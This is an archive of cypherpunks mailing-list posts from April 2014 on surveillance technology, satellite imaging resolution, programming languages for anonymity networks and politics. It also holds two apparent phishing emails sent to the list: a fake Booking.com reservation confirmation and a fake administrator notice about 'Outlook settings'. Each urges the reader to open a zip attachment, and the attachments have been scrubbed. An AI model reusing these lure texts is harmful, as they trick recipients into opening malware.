> Cars are soon to be mandated to implement

Mandated by?...by jesus...or by the american government, which amounts to the same thing.

Anyway, all this is of course a political problem and so it requires a political solution. A solution that government, which is the driving force behind the problem, isn't going to provide.

>
> --dan
>

From bmanning at isi.edu Fri Apr 18 15:34:38 2014
From: bmanning at isi.edu (Manning-ISI)
Date: Fri, 18 Apr 2014 15:34:38 -0700
Subject: NSA good guys
In-Reply-To: <535184aa.0562340a.0d71.ffffd9d1@mx.google.com>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <535184aa.0562340a.0d71.ffffd9d1@mx.google.com>
Message-ID: <6A28B4E1-F199-4103-8416-1AE800132205@isi.edu>

On 18 April 2014 (Friday), at 10:01, Juan wrote:

> On Thu, 17 Apr 2014 22:09:36 -0400
> dan at geer.org wrote:
>
>>
>> |
>> | It may be possible, in the not-so-distant-future, to record
>> | people in ultra high definition from a mile away, but the
>> | 'technology' can be rendered rather useless with something
>> | like...this
>> |
>> | http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg
>> |
>>
>>
>> At this time, it is possible to do facial recognition at 500 meters,
>> iris recognition at 50 meters, and heartbeat recognition at 5 meters.

[ dan's plausible near future description elided ]

>>
>> But you know all that, paper hospital masks notwithstanding.
>
>
> Well, the scenario you paint is scary and looks a bit like
> science fiction. On one hand I do get your point. On the other
> hand I can't help but mention again that your
> iris-recognition-from-orbit can be defeated with $5 contact
> lenses. Other 'technologies' can certainly be more intrusive.
you mean like these guys?

http://en.wikipedia.org/wiki/Google_Contact_Lens

>
>> The Smart Meter soon to be imposed

by SoCalEd & PGE in California...

>
>> Cars are soon to be mandated to implement

Japan is clearly headed in that direction...

>
> Mandated by?...by jesus...or by the american government, which
> amounts to the same thing.
>
> Anyway, all this is of course a political problem and so it
> requires a political solution.

Actually, it's an economics problem...

>
>
>
>
>
>>
>> --dan
>>
>

From jamesdbell9 at yahoo.com Fri Apr 18 17:02:25 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Fri, 18 Apr 2014 17:02:25 -0700 (PDT)
Subject: NSA good guys
In-Reply-To: <20140418020936.D82A62280DC@palinka.tinho.net>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net>
Message-ID: <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com>

From: "dan at geer.org"

|     It may be possible, in the not-so-distant-future, to record
|     people in ultra high definition from a mile away, but the
|     'technology' can be rendered rather useless with something
|     like...this
|
|     http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg
|

> At this time, it is possible to do facial recognition at 500 meters,
> iris recognition at 50 meters, and heartbeat recognition at 5 meters.
> A newspaper open on a table can be read from orbit.

I strongly doubt the part about reading the newspaper from orbit. I don't doubt that the pattern of text and pictures on the front page could be identified from orbit. ('Identifying the difference between Pravda and Izvestia'.) An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an angle of one arc-second. A mirror of the size of the Hubble Space Telescope (which I assume approximates that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20 arc-second.
That's 1/((57 degrees per radian)(3600 arc-seconds per degree)(20)) = 1/4,100,000 radian. From an altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeters. Maybe that's a pixel-pair, but it's far too large to resolve the text on a newspaper.

The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology. Light-gathering capability isn't important in this application; high resolution is. Making a spy-telescope out of a few different mirrors, held precisely many meters apart, could conceivably achieve resolutions substantially greater than this.

        Jim Bell

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2850 bytes
Desc: not available
URL:

From cathalgarvey at cathalgarvey.me Fri Apr 18 11:18:13 2014
From: cathalgarvey at cathalgarvey.me (Cathal Garvey (Phone))
Date: Fri, 18 Apr 2014 19:18:13 +0100
Subject: [tor-talk] Programming language for anonymity network
In-Reply-To: <1397842871.5862.11.camel@anglachel>
References: <5350E1BD.5010304@mpi-sws.org> <1397842871.5862.11.camel@anglachel>
Message-ID: <83fae3b5-4688-4351-8455-53f9cefe49ab@email.android.com>

Actually process-based parallelism is supported in more recent Pythons, for the reason that using processes passes management largely to the OS. It's not the only way to do parallelism but it's recommended by some.

Thanks for suggesting OCaml: have seen it recommended a lot lately, better check it out.

On 18 April 2014 18:41:11 GMT+01:00, Ted Smith wrote:
> OCaml. http://ocaml.org/
>
> 1. OCaml is more obscure than many languages, but it supports
> programming in imperative, object-oriented, and functional
> styles (though it's obviously best suited for a functional
> style). I've seen people write Java in OCaml and produce clean,
> modular code.
> 2.
> OCaml is used in industrial environments (it's gotten pretty
> popular on Wall Street) and in open-source projects; the
> toolchain is mature and the community is vibrant.
> 3. OCaml is memory safe, but more importantly, it's type safe, and
> its type system is capable of encoding a great deal of your
> program's correctness. It will take some time to get your
> program to compile, but when it does you have a much stronger
> assurance that your program is correct than you do in C, C++, or
> Java.
> 4. OCaml compiles to native code; I'm not sure if deterministic
> builds have been done but they should be possible.
> 5. (Performance, the hidden elephant in every language discussion
> room) The OCaml team takes security seriously, and OCaml is
> performance-competitive with C. OCaml does tail-call
> elimination, so you can write programs functionally that are
> memory-efficient.
> 6. (Weaknesses) OCaml has a global lock due to its garbage
> collection, so parallel programming has to be done with
> processes. This is (IMO) cleaner than in similar situations like
> Python, but is obviously suboptimal.
>
> I'd highly recommend reading through this blog series, chronicling a
> developer picking OCaml as the language to rewrite a large Python
> open-source project in. It doesn't have the same focus as you, but it
> goes over various reasons why someone might switch to OCaml, and
> introduces some OCaml features:
> http://roscidus.com/blog/blog/categories/ocaml/
>
>
>
> On Fri, 2014-04-18 at 10:26 +0200, Stevens Le Blond wrote:
>> Hello,
>>
>> We are a team of researchers working on the design and implementation of
>> a traffic-analysis resistant anonymity network and we would like to
>> request your opinion regarding the choice of a programming language /
>> environment.
>> Here are the criteria:
>>
>> 1) Familiarity: The language should be familiar or easy to learn for
>> most potential contributors, as we hope to build a diverse community
>> that builds on and contributes to the code.
>>
>> 2) Maturity: The language implementation, tool chain and libraries
>> should be mature enough to support a production system.
>>
>> 3) Language security: The language should minimize the risk of security
>> relevant bugs like buffer overflows.
>>
>> 4) Security of runtime / tool chain: It should be hard to
>> inconspicuously backdoor the tool chain and, if applicable, runtime
>> environments.
>>
>> To give two concrete examples:
>>
>> Using the C language + deterministic builds is an attractive option with
>> respect to 1), 2) and 4), but doesn’t provide much regarding 3).
>>
>> Java does better with respect to 3), however, it trades some of 3) and
>> 4) as compared to C. Specifically, we are concerned that large runtimes
>> may be difficult to audit. A similar argument may apply to other
>> interpreted languages.
>>
>> Given these criteria, what language would you choose and for what
>> reasons? We would also appreciate feedback regarding our criteria.
>>
>> All the best,
>> David, Nick, Peter, Stevens, and William
>>
>
> --
> Sent from Ubuntu

--
Sent from my Android device with K-9 Mail. Please excuse my brevity.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 4731 bytes
Desc: not available
URL:

From coderman at gmail.com Fri Apr 18 20:25:49 2014
From: coderman at gmail.com (coderman)
Date: Fri, 18 Apr 2014 20:25:49 -0700
Subject: [liberationtech] Programming language for anonymity network
In-Reply-To: <5350E1BD.5010304@mpi-sws.org>
References: <5350E1BD.5010304@mpi-sws.org>
Message-ID:

On Fri, Apr 18, 2014 at 1:26 AM, Stevens Le Blond wrote:
> ...
> We are a team of researchers working on the design and implementation of
> a traffic-analysis resistant anonymity network...
is this an implementation of existing research, or experimentation with novel architectures? tell us more :) > ... and we would like to > request your opinion regarding the choice of a programming language / > environment. Here are the criteria:... > 1) Familiarity: ... > 2) Maturity: ... > 3) Language security: ... > 4) Security of runtime / tool chain:.. use modern C++ with testing discipline. , but what about this traffic analysis resistant anonymity network, low latency too? *grin* best regards, From coderman at gmail.com Fri Apr 18 20:34:29 2014 From: coderman at gmail.com (coderman) Date: Fri, 18 Apr 2014 20:34:29 -0700 Subject: NSA good guys In-Reply-To: References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> Message-ID: On Fri, Apr 18, 2014 at 5:46 AM, John Young wrote: > ... Kickstart a > religion, call it Darksec. Give away free, with 3D funny > hats and walks and masks. Beguile officials into > raiding your printer buried under Hettinga's compost > of coconut shell Bitcoins. damnit John, that was only going to work when they didn't know it was a trap... -_- From customer.service at booking.com Fri Apr 18 13:18:31 2014 From: customer.service at booking.com (Booking.com) Date: Fri, 18 Apr 2014 21:18:31 +0100 Subject: Your reservation is now confirmed! Message-ID: Thanks! Your reservation is now confirmed. Booking number: 315625687 PIN Code: 8467 Email: cypherpunks at jfet.org Your reservation: 1 night, 1 room Check in: Monday, April 28, 2014 (2:00 pm - 00:00 am) Check out: Tuesday, April 29, 2014 (until 12:00 pm) Superior Double Room $1,799.68 VAT (20%) included $449.92 Total Price $2,249.60 Please note: additional supplements (e.g. extra bed) are not added to this total. The total price shown is the amount you will pay to the property. Booking.com does not charge any reservation, administration or other fees. 
You can easily change or cancel this booking for free before August 6 - 2013.
To cancel or modify your reservation please complete the attached form and
fax it to: +1 888 850 3067

Have a great trip!
- The Booking.com Team

Copyright 1996 - 2013 Booking.com. All rights reserved.
This email was sent by Booking.com, Herengracht 597, 1017 CE Amsterdam,
Netherlands
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 15901 bytes
Desc: not available
URL:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Booking number 315625687.zip
Type: application/zip
Size: 6598 bytes
Desc: not available
URL:

From Administrator at jfet.org  Fri Apr 18 15:14:28 2014
From: Administrator at jfet.org (Administrator)
Date: Fri, 18 Apr 2014 22:14:28 +0000
Subject: Important - New Outlook Settings
Message-ID:

Please carefully read the attached instructions before updating settings.

This e-mail and / or any attachment(s) is intended solely for the
above-mentioned recipient(s) and it may contain confidential or privileged
information. If you have received it in error, please notify us immediately
at helpdesk at jfet.org and delete the e-mail. You must not copy it,
distribute it, disclose it or take any action in reliance on it.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: OutlookSettings.zip
Type: application/zip
Size: 6598 bytes
Desc: not available
URL:

From juan.g71 at gmail.com  Fri Apr 18 21:31:38 2014
From: juan.g71 at gmail.com (Juan)
Date: Sat, 19 Apr 2014 01:31:38 -0300
Subject: NSA good guys
In-Reply-To: <6A28B4E1-F199-4103-8416-1AE800132205@isi.edu>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com>
    <20140418020936.D82A62280DC@palinka.tinho.net>
    <535184aa.0562340a.0d71.ffffd9d1@mx.google.com>
    <6A28B4E1-F199-4103-8416-1AE800132205@isi.edu>
Message-ID: <5352265a.89bc340a.1b27.fffff301@mx.google.com>

On Fri, 18 Apr 2014 15:34:38 -0700
Manning-ISI wrote:

> > . Other 'technologies' can certainly be more
> > intrusive.
>
> you mean like these guys?
> http://en.wikipedia.org/wiki/Google_Contact_Lens

Yes...That isn't...encouraging.

> > > The Smart Meter soon to be imposed
> > > by SoCalEd & PGE in California...
> > >
> > > Cars are soon to be mandated to implement
>
> Japan is clearly headed in that direction...
>
> > Mandated by?...by jesus...or by the american government,
> > which amounts to the same thing.
> >
> > Anyway, all this is of course a political problem and so it
> > requires a political solution.
>
> Actually, it's an economics problem...

Care to elaborate?
> >> --dan

From jya at pipeline.com  Sat Apr 19 07:43:11 2014
From: jya at pipeline.com (John Young)
Date: Sat, 19 Apr 2014 10:43:11 -0400
Subject: Inevitable Security Critiques, Promises and Lemons
Message-ID:

Gratifying to see a few of those here featured in NY Times today discussing
inevitable failures and contradictions in security:

http://www.nytimes.com/2014/04/19/technology/heartbleed-highlights-a-contradiction-in-the-web.html

To be read with Schneier's 2007 account of inevitable security lemons
(resurrected by Coderman):

https://www.schneier.com/blog/archives/2007/04/a_security_mark.html

Our security consumer advice based on frank, honest and distrustful
discussions here for nearly 18 years:

"Unreliable SSL has been uninstalled. All security and privacy policies
are unreliable. Protect yourself against security and privacy promises."

Still hopeful Hettinga will plug these insider breaches of why marketing
lemonade is so lucratively persuasive to those who know better. And who
do not disclose here.
From jamesdbell9 at yahoo.com  Sat Apr 19 10:44:50 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Sat, 19 Apr 2014 10:44:50 -0700 (PDT)
Subject: Fw: NSA good guys
In-Reply-To: <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com>
    <20140418020936.D82A62280DC@palinka.tinho.net>
    <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com>
Message-ID: <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com>

[I didn't get a bounce off of CP the first time]

From: "dan at geer.org"

|     It may be possible, in the not-so-distant-future, to record
|     people in ultra high definition from a mile away, but the
|     'technology' can be rendered rather useless with something
|     like...this
|
|     http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg
|

>At this time, it is possible to do facial recognition at 500 meters,
>iris recognition at 50 meters, and heartbeat recognition at 5 meters.
>A newspaper open on a table can be read from orbit.

I strongly doubt the part about reading the newspaper from orbit. I don't
doubt that the pattern of text and pictures on the front page could be
identified from orbit. ('Identifying the difference between Pravda and
Izvestia'.)

An approximation I once heard is that a lens or mirror of about 4.5 inch in
diameter can resolve an angle of one arc-second. A mirror of the size of the
Hubble Space Telescope (which I assume approximates that of the typical spy
satellite today) is about 20x larger, so the resolution should be 20x
better, or 1/20 arc-second. That's 1/((57 degrees per radian)(3600
arcseconds per degree)(20)) = 1/4,100,000 radian. From an altitude of 500
kilometers, that's about 1/8 of a meter, or 120 millimeter. Maybe that's a
pixel-pair, but it's far too large to resolve the text on a newspaper.

The best prospect to improve on this resolution would be to use a
'multiple-mirror-telescope' technology. Light-gathering capability isn't
important in this application; high resolution is. Making a spy-telescope
out of a few different mirrors, held precisely many meters apart, could
conceivably achieve resolutions substantially greater than this.

        Jim Bell
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 4095 bytes
Desc: not available
URL:

From shelley at misanthropia.info  Sat Apr 19 11:59:36 2014
From: shelley at misanthropia.info (shelley at misanthropia.info)
Date: Sat, 19 Apr 2014 11:59:36 -0700
Subject: Fw: NSA good guys
In-Reply-To: <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com>
    <20140418020936.D82A62280DC@palinka.tinho.net>
    <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com>
    <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com>
Message-ID: <1397933976.16040.108223289.7D1D208F@webmail.messagingengine.com>

On Sat, Apr 19, 2014, at 10:44 AM, jim bell wrote:
> [I didn't get a bounce off of CP the first time]

Jim, it did post to the list the first time. This has happened to me before,
as well: I've received an off-list reply from someone to a message (sent
only to the list) long before I saw it post on the list. There is often a
delay and I'm not sure why; I'll look at the path in headers the next time
it happens.

(Also, on-topic: you make some good points here!)

> From: "" <>
>
> |     It may be possible, in the not-so-distant-future, to record
> |     people in ultra high definition from a mile away, but the
> |     'technology' can be rendered rather useless with something
> |     like...this
> |
> |
> |
>
> >At this time, it is possible to do facial recognition at 500 meters,
> >iris recognition at 50 meters, and heartbeat recognition at 5 meters.
> >A newspaper open on a table can be read from orbit.
>
> I strongly doubt the part about reading the newspaper from orbit.
> I don't doubt that the pattern of text and pictures on the front page
> could be identified from orbit. ('Identifying the difference between
> Pravda and Izvestia'.)   An approximation I once heard is that a lens or
> mirror of about 4.5 inch in diameter can resolve an angle of one
> arc-second.  A mirror of the size of the Hubble Space Telescope (which I
> assume approximates that of the typical spy satellite today) is about 20x
> larger, so the resolution should be 20x better, or 1/20 arc-second.
> That's 1/((57 degrees per radian)(3600 arcseconds per degree)(20)) =
> 1/4,100,000 radian.  From an altitude of 500 kilometers, that's about 1/8
> of a meter, or 120 millimeter.  Maybe that's a pixel-pair, but it's far
> too large to resolve the text on a newspaper.
>
> The best prospect to improve on this resolution would be to use a
> 'multiple-mirror-telescope' technology.  Light-gathering capability isn't
> important in this application; high resolution is.  Making a
> spy-telescope out of a few different mirrors, held precisely many meters
> apart, could conceivably achieve resolutions substantially greater than
> this.
>         Jim Bell

From jamesdbell9 at yahoo.com  Sat Apr 19 12:15:47 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Sat, 19 Apr 2014 12:15:47 -0700 (PDT)
Subject: Fw: NSA good guys
In-Reply-To: <20140419182746.GC2173@nl.grid.coop>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com>
    <20140418020936.D82A62280DC@palinka.tinho.net>
    <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com>
    <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com>
    <20140419182746.GC2173@nl.grid.coop>
Message-ID: <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com>

From: Troy Benjegerdes
To: jim bell

>> [I didn't get a bounce off of CP the first time]
>> Izvestia'.)   An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an
>> angle of one arc-second.  A mirror of the size of the Hubble Space Telescope (which I assume approximates
>> that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20
>> arc-second.  That's 1/((57 degrees per radian)(3600 arcseconds per degree)(20)) = 1/4,100,000 radian.  From an
>> altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeter.  Maybe that's a pixel-pair, but it's far
>> too large to resolve the text on a newspaper.
>>
>> The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology.
>> Light-gathering capability isn't important in this application; high resolution is.  Making a spy-telescope out of a
>> few different mirrors, held precisely many meters apart, could conceivably achieve resolutions substantially
>> greater than this.
>>    Jim Bell

> Such a mirror array would at some point reflect enough light at odd angles to be visible with the
> naked eye.
> I find it more likely that multiple-mirror-telescope tech would be implemented with a swarm of small
> satellites and extremely precise location tracking and a lot of signal processing later on.

I sure find that difficult to imagine!  Particularly because the assemblage
would presumably be flying at about 500 kilometers altitude, and would
therefore be buffeted by extremely-small-but-significant orbital winds.  In
addition, the amount of information that would have to be interchanged
(phase and amplitude, in TWO dimensions!) of an entire field of view would
be phenomenal.

What I suspect the US military would really like to see is a spy satellite
at geosync altitude (22,000 miles) with an apparent aperture of perhaps 150
meters, so that it has roughly the same resolution on the ground as existing
fast-orbital spy satellites.  (orbital period circa 90 minutes or so).

              Jim Bell
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 3335 bytes
Desc: not available
URL:

From hozer at hozed.org  Sat Apr 19 11:27:46 2014
From: hozer at hozed.org (Troy Benjegerdes)
Date: Sat, 19 Apr 2014 13:27:46 -0500
Subject: Fw: NSA good guys
In-Reply-To: <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com>
    <20140418020936.D82A62280DC@palinka.tinho.net>
    <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com>
    <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com>
Message-ID: <20140419182746.GC2173@nl.grid.coop>

On Sat, Apr 19, 2014 at 10:44:50AM -0700, jim bell wrote:
> [I didn't get a bounce off of CP the first time]
>
> From: "dan at geer.org"
>
> |     It may be possible, in the not-so-distant-future, to record
> |     people in ultra high definition from a mile away, but the
> |     'technology' can be rendered rather useless with something
> |     like...this
> |
> |     http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg
> |
>
> >At this time, it is possible to do facial recognition at 500 meters,
> >iris recognition at 50 meters, and heartbeat recognition at 5 meters.
> >A newspaper open on a table can be read from orbit.
>
> I strongly doubt the part about reading the newspaper from orbit.  I don't
> doubt that the pattern of text and pictures on the front page could be
> identified from orbit. ('Identifying the difference between Pravda and
> Izvestia'.)   An approximation I once heard is that a lens or mirror of
> about 4.5 inch in diameter can resolve an angle of one arc-second.  A
> mirror of the size of the Hubble Space Telescope (which I assume
> approximates that of the typical spy satellite today) is about 20x larger,
> so the resolution should be 20x better, or 1/20 arc-second.  That's
> 1/((57 degrees per radian)(3600 arcseconds per degree)(20)) = 1/4,100,000
> radian.  From an altitude of 500 kilometers, that's about 1/8 of a meter,
> or 120 millimeter.  Maybe that's a pixel-pair, but it's far too large to
> resolve the text on a newspaper.
>
> The best prospect to improve on this resolution would be to use a
> 'multiple-mirror-telescope' technology.  Light-gathering capability isn't
> important in this application; high resolution is.  Making a
> spy-telescope out of a few different mirrors, held precisely many meters
> apart, could conceivably achieve resolutions substantially greater than
> this.
>         Jim Bell

Such a mirror array would at some point reflect enough light at odd angles
to be visible with the naked eye.

I find it more likely that multiple-mirror-telescope tech would be
implemented with a swarm of small satellites and extremely precise location
tracking and a lot of signal processing later on.

From guninski at guninski.com  Sat Apr 19 06:45:10 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Sat, 19 Apr 2014 16:45:10 +0300
Subject: Does a society of sheep deserve a government of wolves?
Message-ID: <20140419134510.GA3833@sivokote.iziade.m$>

The question is:

===
Does a society of sheep deserve a government of wolves?
===

Some rants:

Obama is protecting the NSA and is probably
claiming "I am elected by the sheep, so the
sheep are protecting the NSA".

If it weren't Obama only the names would
change.

The majority of sheep are economically
enslaved and/or brainwashed IMO.

From cypher at cpunk.us  Sat Apr 19 16:25:08 2014
From: cypher at cpunk.us (Cypher)
Date: Sat, 19 Apr 2014 18:25:08 -0500
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <20140419134510.GA3833@sivokote.iziade.m$>
References: <20140419134510.GA3833@sivokote.iziade.m$>
Message-ID: <535305D4.3020407@cpunk.us>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 04/19/2014 08:45 AM, Georgi Guninski wrote:
> The question is:
>
> === Does a society of sheep deserve a government of wolves?

If we, who know better, don't help the sheep rise out of their bondage
then we become the wolves.
- --
Want to communicate with me privately? Find my PGP public key here:
http://pgp.mit.edu/pks/lookup?op=get&search=0x5BAEB5B2FA26826B
Fingerprint: 6728 40CE 35EE 0BF3 2E15 C7CC 5BAE B5B2 FA26 826B

From davidroman96 at gmail.com  Sat Apr 19 09:37:27 2014
From: davidroman96 at gmail.com (davidroman96)
Date: Sat, 19 Apr 2014 18:37:27 +0200
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <20140419134510.GA3833@sivokote.iziade.m$>
References: <20140419134510.GA3833@sivokote.iziade.m$>
Message-ID: <5352A647.5000302@gmail.com>

If the wolves are eating the sheep, we need to fight against the wolves and
help the sheep. We need better encryption and anonymity to speak with
freedom and fight against ignorance and lies. The point is, how can we
create new and better algorithms to protect human rights?

A society of sheep doesn't deserve a government of wolves.

On 19/04/14 15:45, Georgi Guninski wrote:
> The question is:
>
> ===
> Does a society of sheep deserve a government of wolves?
> ===
>
> Some rants:
>
> Obama is protecting the NSA and is probably
> claiming "I am elected by the sheep, so the
> sheep are protecting the NSA".
>
> If it weren't Obama only the names would
> change.
>
> The majority of sheep are economically
> enslaved and/or brainwashed IMO.
>

From cypher at cpunk.us  Sun Apr 20 07:12:36 2014
From: cypher at cpunk.us (Cypher)
Date: Sun, 20 Apr 2014 09:12:36 -0500
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <1980426.dF0qtMjfnf@lap>
References: <20140419134510.GA3833@sivokote.iziade.m$>
    <535305D4.3020407@cpunk.us>
    <1980426.dF0qtMjfnf@lap>
Message-ID: <5353D5D4.2080107@cpunk.us>

On 04/20/2014 03:39 AM, rysiek wrote:
> On Saturday, 19 April 2014 18:25:08 Cypher wrote:
>> On 04/19/2014 08:45 AM, Georgi Guninski wrote:
>>> The question is:
>>>
>>> === Does a society of sheep deserve a government of wolves?
>>
>> If we, who know better, don't help the sheep rise out of their
>> bondage then we become the wolves.
>
> Or get killed by the wolves, so that we can't help the sheep
> anymore.

That is a better fate than joining the feeding frenzy.

From hettinga at gmail.com  Sun Apr 20 06:55:13 2014
From: hettinga at gmail.com (Robert Hettinga)
Date: Sun, 20 Apr 2014 09:55:13 -0400
Subject: [Cryptography] Inevitable Security Critiques, Promises and Lemons
In-Reply-To:
References:
Message-ID:

On Apr 19, 2014, at 10:07 AM, John Young wrote:

> Still hopeful Hettinga will plug these insider breaches of why marketing
> lemonade is so lucratively persuasive to those who know better. And who
> do not disclose here.

I’ll endeavour to persevere…

Cheers,
RAH
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 496 bytes
Desc: Message signed with OpenPGP using GPGMail
URL:

From rysiek at hackerspace.pl  Sun Apr 20 01:39:39 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Sun, 20 Apr 2014 10:39:39 +0200
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <535305D4.3020407@cpunk.us>
References: <20140419134510.GA3833@sivokote.iziade.m$>
    <535305D4.3020407@cpunk.us>
Message-ID: <1980426.dF0qtMjfnf@lap>

On Saturday, 19 April 2014 18:25:08 Cypher wrote:
> On 04/19/2014 08:45 AM, Georgi Guninski wrote:
> > The question is:
> >
> > === Does a society of sheep deserve a government of wolves?
>
> If we, who know better, don't help the sheep rise out of their
> bondage then we become the wolves.

Or get killed by the wolves, so that we can't help the sheep anymore.

--
Regards
rysiek
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 316 bytes
Desc: This is a digitally signed message part.
URL:

From guninski at guninski.com  Sun Apr 20 03:34:38 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Sun, 20 Apr 2014 13:34:38 +0300
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <1980426.dF0qtMjfnf@lap>
References: <20140419134510.GA3833@sivokote.iziade.m$>
    <535305D4.3020407@cpunk.us>
    <1980426.dF0qtMjfnf@lap>
Message-ID: <20140420103438.GA2557@sivokote.iziade.m$>

On Sun, Apr 20, 2014 at 10:39:39AM +0200, rysiek wrote:
> On Saturday, 19 April 2014 18:25:08 Cypher wrote:
> > On 04/19/2014 08:45 AM, Georgi Guninski wrote:
> > > The question is:
> > >
> > > === Does a society of sheep deserve a government of wolves?
> >
> > If we, who know better, don't help the sheep rise out of their
> > bondage then we become the wolves.
>
> Or get killed by the wolves, so that we can't help the sheep anymore.
>
> --
> Regards
> rysiek

Happy Easter.

In Bulgarian: Христос Возкресе! (Christ is Risen!)

From coderman at gmail.com  Sun Apr 20 17:05:59 2014
From: coderman at gmail.com (coderman)
Date: Sun, 20 Apr 2014 17:05:59 -0700
Subject: the Great Filter of private communication
Message-ID:

we have the maths! we have the technology!

... yet actual robust, private communications remain elusive.

where is the "Great Filter" thwarting our privacy codes?

is it usability; anything more than invisibly automatic a failure?

is it cost; anything more than zero too much to bear in the market?

is it correctness; anything less than a single mode always secure, broken?

perhaps all of these above, each a requisite element of robustness,
further compounding the difficulty of realizing an ideal.

From rysiek at hackerspace.pl  Sun Apr 20 08:38:08 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Sun, 20 Apr 2014 17:38:08 +0200
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <5353D5D4.2080107@cpunk.us>
References: <20140419134510.GA3833@sivokote.iziade.m$>
    <1980426.dF0qtMjfnf@lap>
    <5353D5D4.2080107@cpunk.us>
Message-ID: <10925020.WpicNprW44@lap>

On Sunday, 20 April 2014 09:12:36 Cypher wrote:
> On 04/20/2014 03:39 AM, rysiek wrote:
> > On Saturday, 19 April 2014 18:25:08 Cypher wrote:
> >> On 04/19/2014 08:45 AM, Georgi Guninski wrote:
> >>> The question is:
> >>>
> >>> === Does a society of sheep deserve a government of wolves?
> >>
> >> If we, who know better, don't help the sheep rise out of their
> >> bondage then we become the wolves.
> >
> > Or get killed by the wolves, so that we can't help the sheep
> > anymore.
>
> That is a better fate than joining the feeding frenzy.

Still, I think we can put up a fight and try to do something about the wolves.

--
Regards
rysiek
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 316 bytes
Desc: This is a digitally signed message part.
URL:

From coderman at gmail.com  Sun Apr 20 21:36:12 2014
From: coderman at gmail.com (coderman)
Date: Sun, 20 Apr 2014 21:36:12 -0700
Subject: [liberationtech] Programming language for anonymity network
In-Reply-To:
References: <5350E1BD.5010304@mpi-sws.org>
Message-ID:

On Fri, Apr 18, 2014 at 8:25 PM, coderman wrote:
> ... the criteria:...
>> 1) Familiarity: ...
>> 2) Maturity: ...
>> 3) Language security: ...
>> 4) Security of runtime / tool chain:..
>
>
> use modern C++ with testing discipline.

also relevant:
https://chriskohlhepp.wordpress.com/convergence-of-modern-cplusplus-and-lisp/

which gets kudos for also mentioning the benefits of modern C++ in respect
to unit tests.

to summarize the goals for your C++ implementation:
- reads with clarity like a high level language
- performs with efficiency like a low level language
- tests with coverage across whole codebase regardless of language.

full disclosure: i am a completely not biased party in this declaration of
absolute truth. *cough*

best regards,

From coderman at gmail.com  Sun Apr 20 22:43:48 2014
From: coderman at gmail.com (coderman)
Date: Sun, 20 Apr 2014 22:43:48 -0700
Subject: NSA good guys
In-Reply-To: <20140421044425.CE0C42280C9@palinka.tinho.net>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com>
    <20140421044425.CE0C42280C9@palinka.tinho.net>
Message-ID:

On Sun, Apr 20, 2014 at 9:44 PM,  wrote:
> ...
> perhaps you would prefer this
>
> http://www.bbc.com/news/blogs-news-from-elsewhere-27067012

i wear my 'Edgar'[0] suit in public. or did, until it became made known unto
me that such disguises are socially inappropriate.

perhaps a better idea is to go in public as a celebrity, thereby confounding
the automated identification systems while improving the odds of better
service from others. ;)

best regards,

